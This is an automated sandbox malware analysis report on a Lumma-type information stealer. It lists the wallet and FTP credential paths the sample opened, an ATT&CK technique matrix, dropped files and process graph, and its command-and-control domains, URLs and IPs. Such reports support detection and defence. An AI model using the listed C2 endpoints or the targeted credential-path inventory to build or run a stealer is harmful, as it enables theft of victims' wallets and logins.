                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: Yara matchFile source: 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3872846044.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3868669756.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3868587610.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.3858599222.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: qnUFsmyxMm.exe PID: 6464, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: qnUFsmyxMm.exe PID: 6464, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.qnUFsmyxMm.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  1
                  Masquerading
                  2
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Screen Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  12
                  Virtualization/Sandbox Evasion
                  LSASS Memory231
                  Security Software Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection
                  Security Account Manager12
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares41
                  Data from Local System
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Deobfuscate/Decode Files or Information
                  NTDS2
                  Process Discovery
                  Distributed Component Object Model2
                  Clipboard Data
                  114
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets2
                  System Owner/User Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials11
                  File and Directory Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583036 Sample: qnUFsmyxMm.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 75 leeryspcieu.click 2->75 77 klipjarifaa.shop 2->77 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Antivirus / Scanner detection for submitted sample 2->89 91 4 other signatures 2->91 12 qnUFsmyxMm.exe 1 2->12         started        signatures3 process4 dnsIp5 79 leeryspcieu.click 172.67.219.133, 443, 49975, 49976 CLOUDFLARENETUS United States 12->79 81 klipjarifaa.shop 188.114.97.3, 443, 49983 CLOUDFLARENETUS European Union 12->81 73 C:\...behaviorgraphWFNGPZJFQA2LD103N7W76JNMRKLK.exe, PE32 12->73 dropped 93 Query firmware table information (likely to detect VMs) 12->93 95 Found many strings related to Crypto-Wallets (likely being stolen) 12->95 97 Tries to harvest and steal ftp login credentials 12->97 99 3 other signatures 12->99 17 GWFNGPZJFQA2LD103N7W76JNMRKLK.exe 2 12->17         started        file6 signatures7 process8 file9 57 C:\...behaviorgraphWFNGPZJFQA2LD103N7W76JNMRKLK.tmp, PE32 17->57 dropped 83 Multi AV Scanner detection for dropped file 17->83 21 GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp 3 5 17->21         started        signatures10 process11 file12 59 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 21->59 dropped 61 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 21->61 dropped 24 GWFNGPZJFQA2LD103N7W76JNMRKLK.exe 2 21->24         started        process13 file14 63 C:\...behaviorgraphWFNGPZJFQA2LD103N7W76JNMRKLK.tmp, PE32 24->63 dropped 27 GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp 5 7 24->27         started        process15 file16 65 C:\Users\user\AppData\...\is-96L6E.tmp, PE32 27->65 dropped 67 C:\Users\user\...\ColorStreamLib.exe (copy), PE32 27->67 dropped 69 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 27->69 dropped 71 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 27->71 dropped 30 ColorStreamLib.exe 27->30         started        33 cmd.exe 1 27->33         started        35 cmd.exe 1 27->35         started        37 5 other processes 27->37 process17 signatures18 101 Sample or dropped binary is a compiled AutoHotkey binary 30->101 39 conhost.exe 33->39         started        41 tasklist.exe 1 33->41         started        43 find.exe 1 33->43         started        45 conhost.exe 35->45         started        53 2 other processes 35->53 47 conhost.exe 37->47         started        49 conhost.exe 37->49         started        51 conhost.exe 37->51         started        55 10 other processes 37->55 process19

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  qnUFsmyxMm.exe42%VirustotalBrowse
                  qnUFsmyxMm.exe34%ReversingLabsWin32.Trojan.Generic
                  qnUFsmyxMm.exe100%AviraHEUR/AGEN.1308324
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe51%ReversingLabsWin32.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://klipjarifaa.shop/-90%Avira URL Cloudsafe
                  leeryspcieu.click0%Avira URL Cloudsafe
                  https://leeryspcieu.click/U90%Avira URL Cloudsafe
                  https://klipjarifaa.shop/int_clp_8888.txt0%Avira URL Cloudsafe
                  https://leeryspcieu.click/apiP0%Avira URL Cloudsafe
                  https://klipjarifaa.shop/0%Avira URL Cloudsafe
                  https://klipjarifaa.shop/=90%Avira URL Cloudsafe
                  https://klipjarifaa.shop/int_clp_8888.txt%0%Avira URL Cloudsafe
                  https://leeryspcieu.click/U:0%Avira URL Cloudsafe
                  https://leeryspcieu.click/api0%Avira URL Cloudsafe
                  https://leeryspcieu.click/0%Avira URL Cloudsafe
                  https://klipjarifaa.shop/int_clp_8888.txth0%Avira URL Cloudsafe
                  https://klipjarifaa.shop/int_clp_8888.txt0sA0%Avira URL Cloudsafe
                  https://leeryspcieu.click/apix0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  leeryspcieu.click
                  172.67.219.133
                  truetrue
                    unknown
                    klipjarifaa.shop
                    188.114.97.3
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      necklacebudi.latfalse
                        high
                        https://leeryspcieu.click/apitrue
                        • Avira URL Cloud: safe
                        unknown
                        aspecteirs.latfalse
                          high
                          leeryspcieu.clicktrue
                          • Avira URL Cloud: safe
                          unknown
                          sustainskelet.latfalse
                            high
                            crosshuaht.latfalse
                              high
                              rapeflowwj.latfalse
                                high
                                https://klipjarifaa.shop/int_clp_8888.txtfalse
                                • Avira URL Cloud: safe
                                unknown
                                energyaffai.latfalse
                                  high
                                  grannyejh.latfalse
                                    high
                                    discokeyus.latfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabqnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUqnUFsmyxMm.exe, 00000000.00000003.3927008169.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924090719.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923676725.0000000003903000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937503296.0000000003907000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928482811.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926046976.00000000039EF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937004478.0000000003900000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921152302.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923794882.00000000039D8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3925160129.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921309363.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937339896.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926694212.000000000390A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926282396.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924759593.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3938216484.0000000003906000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926797756.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3927226610.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921831161.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3931951681.0000000003A0A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928316241.00000000039F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://certs.securetrust.com/CA0:qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://ocsp.vikingcloud.com/0AqnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://certs.securetrust.com/issuers/TWGCA.crt0qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ocsp.vikingcloud.com/0:qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://leeryspcieu.click/U:qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://leeryspcieu.click/U9qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.vikingcloud.com/TWGCA.crl0tqnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://certs.securetrust.com/CA05qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://klipjarifaa.shop/-9qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://x1.c.lencr.org/0qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchqnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://klipjarifaa.shop/int_clp_8888.txt%qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://certs.securetrust.com/CA0qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://klipjarifaa.shop/=9qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://support.mozilla.org/products/firefoxgro.allqnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.trustwave.com/TWGCA.crl0nqnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://klipjarifaa.shop/qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoqnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.securetrust.com/TWGCSCA_L1.crl0yqnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://leeryspcieu.click/apiPqnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://ocsp.rootca1.amazontrust.com0:qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brqnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ac.ecosia.org/autocomplete?q=qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://klipjarifaa.shop/int_clp_8888.txt0sAqnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://leeryspcieu.click/apixqnUFsmyxMm.exe, 00000000.00000003.3853254066.0000000003362000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://leeryspcieu.click/qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3872774190.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826083750.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826098111.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826000118.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://klipjarifaa.shop/int_clp_8888.txthqnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://ocsp.securetrust.com/0?qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  188.114.97.3
                                                                                                  klipjarifaa.shopEuropean Union
                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                  172.67.219.133
                                                                                                  leeryspcieu.clickUnited States
                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1583036
                                                                                                  Start date and time:2025-01-01 16:50:09 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 11m 15s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:35
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:qnUFsmyxMm.exe
                                                                                                  renamed because original name is a hash value
                                                                                                  Original Sample Name:a00f1411626bdf8860a00a2ee9f77709.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@56/10@2/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 66.7%
                                                                                                  HCA Information:Failed
